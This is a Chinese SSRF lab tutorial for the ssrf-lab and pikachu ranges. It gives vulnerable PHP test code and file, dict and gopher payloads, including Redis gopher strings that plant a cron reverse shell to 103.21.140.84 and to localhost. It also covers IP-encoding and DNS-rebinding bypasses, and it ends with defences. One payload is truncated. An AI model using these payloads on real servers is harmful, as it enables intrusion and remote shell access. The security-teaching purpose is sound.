WEB常见漏洞之SSRF（靶场篇）

靶场地址：

https://github.com/m6a-UdS/ssrf-lab
https://github.com/zhuifengshaonianhanlu/pikachu

0x01 概述

SSRF 主要是由于一些危险函数与危险协议产生的。我们以 PHP 为例，

列举一下这些危险函数

file_get_contents()
fsockopen()
curl_exec()
SoapClient

一些危险协议

file://
gopher
dict
etc...

0x02 SSRF利用方式

主要分为两个方向，SSRF 利用相关的危险函数；SSRF 可利用的协议操作

SSRF 利用相关的危险函数

以 PHP 为例，说明一些可利用的危险函数

1. file_get_contents() 与 readfile()

file_get_contents这一函数是把 **传入的参数(变量)**写入字符串，当把 传参是内网文件的时候，会先去吧这个文件的内容读出来再写入，导致了任意文件读取，也就是信息泄露的一种。一般这种攻击也与目录遍历相结合。

测试代码：

// ssrf.php
<?php
$url = $_GET['url'];;
echo file_get_contents($url);
?>

2. fsockopen()

fsockopen($hostname,$port,$errno,$errstr,$timeout)用于打开一个网络连接或者一个 Unix 套接字连接，初始化一个套接字连接到指定主机（hostname），实现对用户指定 url 数据的获取。该函数会使用 socket 跟服务器建立 tcp 连接，进行传输原始数据。fsockopen() 将返回一个文件句柄，之后可以被其他文件类函数调用（例如：fgets()，fgetss()，fwrite()，fclose()还有feof()）如果调用失败，将返回false。

测试代码：

// ssrf.php
<?php
$host=$_GET['url'];
$fp = fsockopen($host, 80, $errno, $errstr, 30);
if (!$fp) {
    echo "$errstr ($errno)<br />\n";
} else {
    $out = "GET / HTTP/1.1\r\n";
    $out .= "Host: $host\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    while (!feof($fp)) {
        echo fgets($fp, 128);
    }
    fclose($fp);
}
?>

构造ssrf.php?url=www.baidu.com即可成功触发 ssrf 并返回百度主页，这种更像是一种重定向 (302) 之类的，没什么用。

3. curl_exec()

curl_init(url) 函数初始化一个新的会话，返回一个 cURL 句柄，供curl_setopt()，curl_exec()和curl_close()函数使用。

测试代码：

// ssrf.php
<?php 
if (isset($_GET['url'])){
  $link = $_GET['url'];
  $curlobj = curl_init(); // 创建新的 cURL 资源
  curl_setopt($curlobj, CURLOPT_POST, 0);
  curl_setopt($curlobj,CURLOPT_URL,$link);
  curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1); // 设置 URL 和相应的选项
  $result=curl_exec($curlobj); // 抓取 URL 并把它传递给浏览器
  curl_close($curlobj); // 关闭 cURL 资源，并且释放系统资源
  // $filename = './curled/'.rand().'.txt';
  // file_put_contents($filename, $result); 
  echo $result;
}
?>

构造ssrf.php?url=www.baidu.com即可成功触发 ssrf 并返回百度主页：

但是攻击方式不止这么一点，其实是可以通过其他方式提高curl_exec()这里的攻击危害的。

最常见的是通过file、dict、gopher这三个协议来进行渗透

curl -vvv 'dict://127.0.0.1:6379/info' 
curl -vvv 'file:///etc/passwd' 
# * 注意: 链接使用单引号，避免$变量问题 
curl -vvv 'gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/103.21.140.84/6789 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'

0x03 SSRF-Lab 靶场

SSRF的危险协议

可利用的常用协议：

• file 协议结合目录遍历读取文件
  
• gopher 协议打开端口
  
• dict 协议主要用于结合curl攻击
  
• http 协议进行内网探测
  

1. file 协议利用
   

基础 payload：

file:///etc/password  # file:// 之后可以接任意文件

结合GET请求(实战渗透常见攻击姿势) payload：

http://ip/exp.php?url=file:///etc/password

在 SSRF-Lab 靶场中直接输入基础的payload(不用GET方式传参)即可

2. dict 协议利用

使用 dict 协议，dict://ip//info可获取本地redis服务配置信息

注：SSRF-Lab 靶场完成此操作需要另外安装 redis-server

3. gopher 协议利用

首先需要了解一下常见攻击 Redis 命令，然后转化为 Gopher 可用的协议

redis-cli -h $1 flushall
echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1\n\n"|redis-cli -h $1 -x set 1
redis-cli -h $1 config set dir /var/spool/cron/
redis-cli -h $1 config set dbfilename root
redis-cli -h $1 save
//redis-cli查看所有的keys及清空所有的数据

这是常见exp，利用时根据需求更换 IP:Port 即可，更改为适配于 Gopher 协议的 URL

gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0

URL解码为：

gopher://127.0.0.1:6379/_*1 $8 flushall *3 $3 set $1 1 $64 */1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1 *4 $6 config $3 set $3 dir $16 /var/www/html/ *4 $6 config $3 set $10 dbfilename $4 root *1 $4 save quit

0x04 皮卡丘靶场

fsockopen()

fsockopen($hostname,$port,$errno,$errstr,$timeout)用于打开一个网络连接或者一个 Unix 套接字连接，初始化一个套接字连接到指定主机（hostname），实现对用户指定 url 数据的获取。该函数会使用 socket 跟服务器建立 tcp 连接，进行传输原始数据。fsockopen() 将返回一个文件句柄，之后可以被其他文件类函数调用（例如：fgets()，fgetss()，fwrite()，fclose()还有feof()）如果调用失败，将返回false。

测试代码：

// ssrf.php
<?php
$host=$_GET['url'];
$fp = fsockopen($host, 80, $errno, $errstr, 30);
if (!$fp) {
    echo "$errstr ($errno)<br />\n";
} else {
    $out = "GET / HTTP/1.1\r\n";
    $out .= "Host: $host\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    while (!feof($fp)) {
        echo fgets($fp, 128);
    }
    fclose($fp);
}
?>

构造ssrf.php?url=www.baidu.com即可成功触发 ssrf 并返回百度主页：

SSRF(file_get_content)：利用file_get_content("path")利用传递的参数，通过file参数访问内部资源，或者跳转到其他服务器页面

测试代码

// ssrf.php
<?php
$url = $_GET['url'];;
echo file_get_contents($url);
?>

上述测试代码中，file_get_contents() 函数将整个文件或一个url所指向的文件读入一个字符串中，并展示给用户，我们构造类似 ssrf_fgc.php?file=../rce/rce.php 的paylaod即可读取服务器本地的任意文件(这里使用windows系统为例)

curl_exec()

curl_init(url)函数初始化一个新的会话，返回一个cURL句柄，供curl_setopt()，curl_exec()和curl_close() 函数使用

测试代码

// ssrf.php
<?php 
if (isset($_GET['url'])){
    $link = $_GET['url'];
    $curlobj = curl_init(); // 创建新的 cURL 资源
    curl_setopt($curlobj, CURLOPT_POST, 0);
    curl_setopt($curlobj,CURLOPT_URL,$link);
    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1); // 设置 URL 和相应的选项
    $result=curl_exec($curlobj); // 抓取 URL 并把它传递给浏览器
    curl_close($curlobj); // 关闭 cURL 资源，并且释放系统资源
    // $filename = './curled/'.rand().'.txt';
    // file_put_contents($filename, $result); 
    echo $result;
}
?>

0x05 一些常见的绕过姿势

1. @ 绕过
   

URL格式为：

[协议类型]://[访问资源需要的凭证信息]@[服务器地址]:[端口号]/[资源层级UNIX文件路径][文件名]?[查询]#[片段ID]

下面是两种访问方式(效果一样，因为解析的本来就是 @ 后面的服务器地址)：

方式一、

> <a href=”http://baidu.com@1.1.1.1″”>http://baidu.com@1.1.1.1

方式二、

> http://1.1.1.1

2. 进制绕过

这里可以参考 SSRF-Lab advance 的第一题

源码

if (preg_match('#^https?://#i', $handler) !== 1) {
echo "Wrong scheme! You can only use http or https!";
 die();
} else if (preg_match('#^https?://10.0.0.3#i', $handler) === 1) {
 echo "Restricted area!";
 die();
}

源码解读：通过正则对输入的 IP 进行了过滤，IP 地址是由四个字节组成的，一旦包含了小数点，就必须考虑到大小端表示，因为这个会影响 IP 地址的解析。不过好在所有的网络地址都是大端表示法，只需要注意这一点即可，下面我们介绍 IP 地址的表达方式。

字符串:      10.0.0.3
二进制:      00001010 . 00000000 . 00000000 . 00000011
十六进制:    0A.00.00.03
整数:        167772163

这些表达方式都能被curl命令解析为正确的IP地址，之后如果我们要访问的IP地址被简单粗暴地过滤了就可以试试这种方法。除了上面的表达方式之外，还可以用 16 进制 0x0A000003 表示IP地址，还有一个很少人知道的绕过小姿势，就是用 8 进制代替 10 进制来表示 IP 地址。在计算机的世界里，一旦在20前面加个0就会变成8进制，比如 http://01200000003实际上还是 http://10.0.0.3，上面两个表达方式，PHP 的 curl 模块能解析出来

十六进制：http://0x0A.0x00.0x00.0x03
八进制：     http://012.00.00.03八进制溢出：http://265.0.0.3

3. 句号绕过 (替换 ".")

4. xip.io 和 xip.name 绕过

泛域名解析，无需配置，将自定义的任何域名解析到指定的IP地址。假设你的IP地址是10.0.0.1，你只需使用 前缀域名+IP地址+xip.io 即可完成相应自定义域名解析

10.0.0.1.xip.io # 解析到 10.0.0.1
www.10.0.0.2.xip.io # www 子域解析到 10.0.0.2 mysite.10.0.0.3.xip.io # mysite 子域解析到 10.0.0.3 foo.bar.10.0.0.4.xip.io # foo.bar 子域解析到 10.0.0.4

xip.name 在使用上与xip.io一致

10.0.0.1.xip.name # 解析到 10.0.0.1 
www.10.0.0.2.xip.name # www 子域解析到 10.0.0.2 mysite.10.0.0.3.xip.name # mysite 子域解析到 10.0.0.3 foo.bar.10.0.0.4.xip.name # foo.bar 子域解析到 10.0.0.4

5. DNS 重绑

1.判定你给的 IP 或者域名解析后的 IP 是否在黑名单中

2.若在，退出报错

3.若不在，再次访问你给的 IP 或者域名解析后的 IP；执行后续业务模块

思路：只需要有个域名，但是它映射两个 IP；同时设置 TTL 为 0，能方便两个 IP 即刻切换。

效果类比：你访问 zxc.com这个域名，第一次解析的 IP 是 192.168.0.3；而第二次解析的IP是 127.0.0.1，如此一来即可进行 SSRF 攻击

0x06 漏洞危害

1. 扫内网
   
2. 向内部任意主机的任意端口发送精心构造的Payload
   
3. DOS攻击（请求大文件，始终保持连接Keep-Alive Always）
   
4. 对内网web应用进行指纹识别，通过访问默认文件实现
   
5. 攻击内网的web应用，主要是使用GET参数就可以实现的攻击（比如struts2，sql注入等）
   
6. 利用file协议读取本地文件等
   

0x07 漏洞防御

1.禁止跳转。
2.过滤返回信息，验证远程服务器对请求的响应是比较容易的方法。如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。
3.限制请求的端口只能为Web端口，不需要的协议，仅仅允许http和https请求。可以防止类似于file://, gopher://, ftp:// 等引起的问题。
4.设置URL白名单或者限制内网IP（使用gethostbyname()判断是否为内网IP）,以防止对内网进行攻击。
5.限制请求的端口为http常用的端口，比如 80、443、8080、8090。
6.统一错误信息，避免用户可以根据错误信息来判断远端服务器的端口状态。
7.对DNS Rebinding，考虑使用DNS缓存或者Host白名单